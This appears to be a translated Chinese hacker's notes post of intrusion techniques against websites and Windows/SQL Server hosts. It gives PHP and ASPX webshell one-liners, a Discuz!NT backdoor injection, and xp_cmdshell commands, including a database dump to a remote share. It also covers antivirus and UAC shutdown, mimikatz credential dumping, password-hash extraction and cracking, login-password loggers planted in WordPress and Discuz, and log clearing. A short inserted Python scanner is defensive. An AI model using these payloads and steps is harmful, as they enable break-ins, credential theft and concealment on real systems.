echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

control userpasswords2    view users' passwords
Export an Access database directly as a shell; prerequisites: table a exists in the Access database, and you know the site's real path.
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
141. During manual MSSQL injection, when you cannot bounce the data out, you mostly end up reading records one at a time, which is tiring. Here is a single statement that reads out all the data:
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:

create table dirs(paths varchar(100),paths1 varchar(100), id int)
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
How to shut down McAfee: // requires SYSTEM privileges; use at or psexec -s cmd.exe
You can upload .com files, e.g. nc.com, to bypass McAfee's executable restriction;
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D

Online password cracking: http://tools88.com/safe/vnc.php
The VNC password can be obtained directly with vncdump, or by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] from a DOS prompt.
exec master..xp_cmdshell 'net user'
Executing commands in MSSQL.
Query to get MSSQL password hashes:
select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
MSSQL database shrinking

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses game_db_201107170400.BAK into 1.rar as 200 MB volumes.
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database as game.bak at D:\WebSites\game.com\UpFileList\game.bak

Key points for penetrating Discuz!NT 3.5:
(1) Visit [site URL]/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
(2) Open the rss.aspx file, copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) The one-line backdoor is then at http://somesite.com.cn/tools/rss.aspx, password pass
d:\rar.exe a -r d:\1.rar d:\website\
Recursively compress website
Note the path of rar.exe
<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
PHP one-line trojan inserted through an unfiltered input
Dumping the database when the web server and database server are separate
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
Restrictions mean a full shell cannot be written, only a one-liner; that is actually enough for anything, just not intuitive or convenient, for example dumping the database.
Here the client's expert mode (write your own code) is used.
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
mysql_free_result($result);

// delete after downloading

ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint: collect OS fingerprints
Scan all ports of 192.168.1.100:
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org    identifies the name servers; gets DNS information
host -l www.owasp.org ns1.secure.net    attempts a zone transfer for owasp.org
Netcraft DNS search service: http://searchdns.netcraft.com/?host

Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)

MSN search: http://search.msn.com syntax: "ip:x.x.x.x" (without quotes)

Webhosting info: http://whois.webhosting.info/ syntax: http://whois.webhosting.info/x.x.x.x

DNSstuff: http://www.dnsstuff.com/ (many services available)

http://net-square.com/msnpawn/index.shtml (requires installation)

tomDNS: http://www.tomdns.net/ (some services are still private)

SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312
Importing a database shows the error "Data too long for column 'username' at row 1". The cause is that Chinese is not supported.

MySQL password change
UPDATE mysql.user SET password=PASSWORD("newpass") where user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-line trojan backdoors

During intrusions I found many advanced PHP one-line trojans. Recording them here so they can later be searched for and removed by keyword.

1.

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_POST['h'],"Access");

// Caidao (China Chopper) one-liner

2.
$filename=$_GET['xbid'];
include ($filename);
// dangerous include: compiles and runs any file as PHP

3.

$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

// rename (copy) any file

4.

$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");

// Caidao (China Chopper) one-liner

5. include ($uid);
// dangerous include: compiles and runs any file as PHP, via POST

// one-liner embedded in a gif

6. Typical one-liners
Backdoor code
<?php eval_r($_POST[sb])?>
Code
<?php @eval_r($_POST[sb])?>
// error-suppressed version
Code
<?php assert($_POST[sb]);?>
// use the expert mode of the lanker one-liner client to execute the relevant PHP statements
Code
<?$_POST['sa']($_POST['sb']);?>
Code
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Code
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// after using this, when configuring the connection in the Caidao client, enter the following in the "config" field
Code
<O>h=@eval_r($_POST[c]);</O>
Code
<script language="php">@eval_r($_POST[sb])</script>
// one-liner that bypasses the <? restriction
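As an added example (my own code, not from simeon's post), a small Python scanner that turns the one-liner patterns catalogued above into keyword rules, the way the note suggests; the sample PHP lines are constructed from those patterns, and the rule names are my own.

```python
import re

# Collapse "p"."r"."e"."g" concatenation so function names reach the keyword rules (items 1, 3, 4 above).
_CONCAT = re.compile(r'(?:(["\'])[^"\']\1\s*\.\s*)+(["\'])[^"\']\2')
SUPERGLOBAL = r'\$_(?:POST|GET|REQUEST|COOKIE|FILES)'
# (rule name, regex); eval_r is included because that spelling appears above.
RULES = [
    ("eval/assert on request data",
     re.compile(r'@?\b(?:eval|eval_r|assert)\s*\(\s*@?' + SUPERGLOBAL)),
    ("eval inside ${...} string interpolation",
     re.compile(r'\$\{\s*@?eval\s*\(')),
    ("regex with /e modifier passed to a call",
     re.compile(r'(?:preg_replace|\$\w+)\s*\(\s*(["\'])/[^"\']*/[a-zA-Z]*e[a-zA-Z]*\1')),
    ("request value called as a function",
     re.compile(SUPERGLOBAL + r'\s*\[[^\]]*\]\s*\(')),
    ("dangerous function name stored in a string",
     re.compile(r'\$\w+\s*=\s*(["\'])(?:eval|assert|preg_replace|copy|system|exec|'
                r'passthru|shell_exec|create_function)\1')),
    ("include/require of a variable",
     re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*@?\$')),
    ('PHP via <script language="php">',
     re.compile(r'<script\s+language\s*=\s*["\']php["\']', re.I)),
]

def normalize(line):
    # Join single-character string pieces: "c"."o"."p"."y" -> "copy"
    def join(m):
        return '"' + ''.join(re.findall(r'["\']([^"\'])["\']', m.group(0))) + '"'
    return _CONCAT.sub(join, line)

def scan_line(line):
    """Return the names of every rule that matches one line of PHP."""
    text = normalize(line)
    return [name for name, rx in RULES if rx.search(text)]

def scan_source(source):
    """Return (line number, rule name) pairs for a whole file."""
    return [(no, name) for no, line in enumerate(source.splitlines(), 1)
            for name in scan_line(line)]

# Constructed sample: the one-liners catalogued above plus one benign line.
SAMPLE = r'''<?php
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
$filename=$_GET['xbid']; include ($filename);
$reg="c"."o"."p"."y"; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
<?php @eval($_POST[sb])?>
<?php assert($_POST[sb]);?>
<?$_POST['sa']($_POST['sb']);?>
@preg_replace("/[email]/e",$_POST['h'],"error");
$telok = "0${@eval($_POST[xxoo])}";
<script language="php">@eval($_POST[sb])</script>
$clean = preg_replace('/\s+/', ' ', $_POST['comment']); // benign: no /e
'''

if __name__ == "__main__":
    for no, name in scan_source(SAMPLE):
        print(f"line {no}: {name}")
```

Every sample line except the first and the benign last one is flagged; the include rule is deliberately broad and is meant for review rather than automatic deletion.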
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory. psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the password
7. Quit with exit; do not just close the window, or the system will crash.
http://www.monyer.com/demo/monyerjs/ fairly comprehensive JS decoding site

Automatically check for critical system patches
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

One-line ASPX backdoor that gets past SafeDog
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Logging WordPress login passwords from a webshell
Logging WordPress login passwords from a webshell, to make further social engineering easier
Add at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
    @fwrite(fopen('pwd.txt',"a+"),$txt);
}
When action=login, the password-logging code is triggered; you can also put this code in the default branch of the switch...case statement.
Just search for case 'login'
and insert it directly below; the logged passwords are written to pwd.txt.
Actually, modifying wp-login.php is not a good approach: it is easily discovered. There are other methods; noting this for the record.
Using the IIS 6 file-parsing vulnerability to get past SafeDog:
antian365.asp;antian365.jpg
Grabbing hashes from various database types to crack the highest-privilege password!
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
crack the upper case hash in 'cain and abel' and then work the case sensitive hash
SQL Server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.
update:- following bernardo's comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins

MYSQL:-

In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1
mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

*mysql >=4.1

mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+
Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql")
select usename, passwd from pg_shadow;
 usename  |               passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, I am a bit bored....

Enabling xp_cmdshell in SQL Server 2005/2008
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
Clearing SQL Server 2008 logs (the client's connection history); be sure to back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete this file:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
Delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
Clear the corresponding entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.

This post was last edited by simeon on 2013-1-3 09:51

Windows 2008 file permission modification
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
I. First check whether the right-click menu has "管理员取得所有权" (Take ownership as administrator); if it does not, import the following .reg:

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Win7 right-click "Take ownership as administrator" .reg import
II. Search the C:\Windows directory for "notepad.exe"; you should find four "notepad.exe" and four "notepad.exe.mui" files:
1. The "notepad.exe" under C:\Windows does not need to be replaced
2. The "notepad.exe" under C:\Windows\System32 does not need to be replaced
3. Leave the four "notepad.exe.mui" files alone
4. Mainly replace the "notepad.exe" in the two directories C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
To replace them: first take administrator ownership of these two folders, then rename "Notepad2.exe" to "notepad.exe" and copy it into both folders;
once replaced, go back to the desktop, create a new txt file and open it to see whether it has changed.
Disabling the security policy (UAC) in Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory: under
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
add the code shown here; it automatically generates csslog.php under the site's ./data/cache/ directory.
You can add a view.php in the ipdata directory to view the records; the password is: falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);